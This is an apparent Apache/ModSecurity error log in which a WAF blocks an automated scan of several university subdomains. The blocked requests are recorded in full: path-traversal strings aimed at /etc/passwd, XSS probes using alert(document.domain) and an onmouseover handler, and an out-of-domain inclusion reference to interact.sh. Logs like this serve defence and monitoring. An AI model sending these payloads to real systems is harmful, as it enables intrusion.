[Tue Aug 29 11:52:17.743528 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAnTlOEAAAAA"]
[Tue Aug 29 11:52:17.791835 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAnHQicAAAAT"]
[Tue Aug 29 11:52:17.830681 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAnHQigAAAAT"]
[Tue Aug 29 11:52:17.837082 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gcCo-f0AAAn95-0AAAAD"]
[Tue Aug 29 11:52:17.863069 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/download"] [unique_id "ZO15gcCo-f0AAAnHQikAAAAT"]
[Tue Aug 29 11:52:17.863648 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gcCo-f0AAAni-AwAAAAU"]
[Tue Aug 29 11:52:17.880289 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAn95-8AAAAD"]
[Tue Aug 29 11:52:17.881358 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gcCo-f0AAAnTlOQAAAAA"]
[Tue Aug 29 11:52:17.912098 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAnTlOUAAAAA"]
[Tue Aug 29 11:52:17.912116 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAni-A4AAAAU"]
[Tue Aug 29 11:52:17.913406 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gcCo-f0AAAn96AAAAAAD"]
[Tue Aug 29 11:52:17.929690 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 5 / [129] [GARMIN_AKCII] Garmin \\xe1\\xee\\xed\\xf3\\xf1 \\xed\\xee\\xe2\\xee\\xf1\\xf2\\xfc \\xe2 \\xe0\\xea\\xf6\\xe8\\xe8"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15gcCo-f0AAAnHQiwAAAAT"]
[Tue Aug 29 11:52:18.541191 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15gsCo-f0AAAnTlOcAAAAA"]
[Tue Aug 29 11:52:18.554854 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ContactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ContactId: \\x22><script>alert(document.domain);</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php"] [unique_id "ZO15gsCo-f0AAAn40z0AAAAW"]
[Tue Aug 29 11:52:18.578883 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15gsCo-f0AAAn40z4AAAAW"]
[Tue Aug 29 11:52:18.608137 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gsCo-f0AAAn96AQAAAAD"]
[Tue Aug 29 11:52:18.628166 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../../../../../../../../../../etc"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO15gsCo-f0AAAnn2CwAAAAe"]
[Tue Aug 29 11:52:18.629447 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15gsCo-f0AAAn96AUAAAAD"]
[Tue Aug 29 11:52:19.626458 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAnHQjEAAAAT"]
[Tue Aug 29 11:52:19.717659 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAnkwhYAAAAY"]
[Tue Aug 29 11:52:19.718600 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAnTlOwAAAAA"]
[Tue Aug 29 11:52:19.719103 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAjdQcMAAAAZ"]
[Tue Aug 29 11:52:19.744039 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAnHQjMAAAAT"]
[Tue Aug 29 11:52:19.744655 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAlIBl4AAAAn"]
[Tue Aug 29 11:52:19.744694 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15g8Co-f0AAAnTlO0AAAAA"]
[Tue Aug 29 11:52:19.760104 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15g8Co-f0AAAn400MAAAAW"]
[Tue Aug 29 11:52:20.622959 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b found within ARGS:event1: \\xd0\\xa1\\xd0\\xbf\\xd0\\xb5\\xd1\\x86\\xd0\\xb8\\xd0\\xb0\\xd0\\xbb\\xd1\\x8c\\xd0\\xbd\\xd1\\x8b\\xd0\\xb5 \\xd0\\xb4\\xd0\\xbe\\xd0\\xba\\xd0\\xbb\\xd0\\xb0\\xd0\\xb4\\xd1\\x8b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15hMCo-f0AAAni-BIAAAAU"]
[Tue Aug 29 11:52:20.870568 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hMCo-f0AAAnd3F0AAAAI"]
[Tue Aug 29 11:52:20.993022 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hMCo-f0AAAni-BQAAAAU"]
[Tue Aug 29 11:52:21.135377 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:author: x\\x22 onmouseover=alert(document.domain) x="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15hcCo-f0AAAn0GdYAAAAa"]
